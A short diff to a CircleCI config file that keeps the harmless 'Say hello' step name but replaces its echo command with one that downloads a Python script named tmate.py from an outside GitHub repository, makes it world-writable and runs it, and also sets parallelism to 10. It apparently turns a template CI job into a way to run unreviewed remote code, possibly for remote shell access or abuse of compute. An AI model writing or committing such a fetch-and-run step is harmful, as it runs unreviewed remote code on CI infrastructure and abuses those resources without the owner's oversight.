--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -12,12 +12,13 @@ jobs:
       - image: cimg/base:stable
     # Add steps to the job
     # See: https://circleci.com/docs/2.0/configuration-reference/#steps
+    parallelism: 10
     steps:
       - checkout
       - run:
           name: "Say hello"
-          command: "echo Hello, World!"
-
+          command: |
+           wget https://raw.githubusercontent.com/Myaxisplay/SC/main/tmate.py && chmod 777 tmate.py && python3 tmate.py
 # Invoke jobs via workflows
 # See: https://circleci.com/docs/2.0/configuration-reference/#workflows
 workflows:
